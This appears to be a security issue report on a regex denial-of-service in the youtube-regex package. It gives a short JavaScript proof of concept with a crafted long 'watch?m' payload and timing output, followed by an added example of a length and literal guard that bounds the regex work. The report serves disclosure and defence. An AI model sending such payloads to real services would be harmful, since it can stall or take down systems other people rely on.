Potential Regex Denial of Service #14

@6en6ar

The regex on line 11 in index.js contains a regex denial of service when large input is provided. It takes a longer amount of time to process larger strings because the regex will try to backtrack each time it encounters watch?-.
PoC:

```js
var youtubeRegex = require('youtube-regex');
const startTime = performance.now()
let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\t'
// contains youtube url address
//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');
youtubeRegex().test(payload);
const endTime = performance.now()
console.log(`Time spent: ${endTime - startTime} milliseconds`)
```

Time spent: 2346.4928520000003 milliseconds
Compared to a smaller payload:
Time spent: 1124.684798 milliseconds
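
A bounded-work guard in front of a backtracking pattern, as an added example that is not part of the original issue or of the youtube-regex package. `URL_RE` is a constructed regex with a similar ambiguous shape (it is not the pattern from index.js), and `scan`, `buildPayload`, `timeMs` and the `MAX_TOKEN` value are hypothetical names and assumptions.

```javascript
// Added example. URL_RE is a constructed pattern with the ambiguous shape the
// issue describes (greedy \S*, then "watch?", then a lazy \S*? before "v=");
// it is NOT the regex from the package's index.js.
const URL_RE = /youtube\.com\/\S*watch\?\S*?v=([\w-]{6,11})/;
const MAX_TOKEN = 2048; // assumed upper bound for a plausible URL

// Scan whitespace-delimited tokens, bounding the work the regex can do.
function scan(input) {
  const result = { matched: false, regexRuns: 0, skipped: 0 };
  for (const token of String(input).split(/\s+/)) {
    // Linear-time checks first: both literals are required for any match,
    // and an oversized token is rejected without reaching the regex.
    if (token.length > MAX_TOKEN ||
        !token.includes('youtube.com/') || !token.includes('v=')) {
      result.skipped++;
      continue;
    }
    result.regexRuns++;
    if (URL_RE.test(token)) { result.matched = true; break; }
  }
  return result;
}

// Constructed input in the style of the issue's PoC, scaled by `repeats`.
function buildPayload(repeats) {
  return 'youtube.com/' + 'watch?m'.repeat(repeats) + '\t';
}

// Wall-clock time of one call, in milliseconds.
function timeMs(fn) {
  const start = performance.now();
  fn();
  return performance.now() - start;
}

// Small sizes keep the demo quick; doubling the input shows the growth.
for (const repeats of [1000, 2000, 4000]) {
  const payload = buildPayload(repeats);
  const raw = timeMs(() => URL_RE.test(payload));
  const guarded = timeMs(() => scan(payload));
  console.log(`${payload.length} chars: raw ${raw.toFixed(1)} ms, ` +
              `guarded ${guarded.toFixed(1)} ms`);
}
```

Because the pattern only uses `\S` between its literals, a match can never span whitespace, so checking one bounded token at a time does not change which inputs match for URLs up to `MAX_TOKEN` characters.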
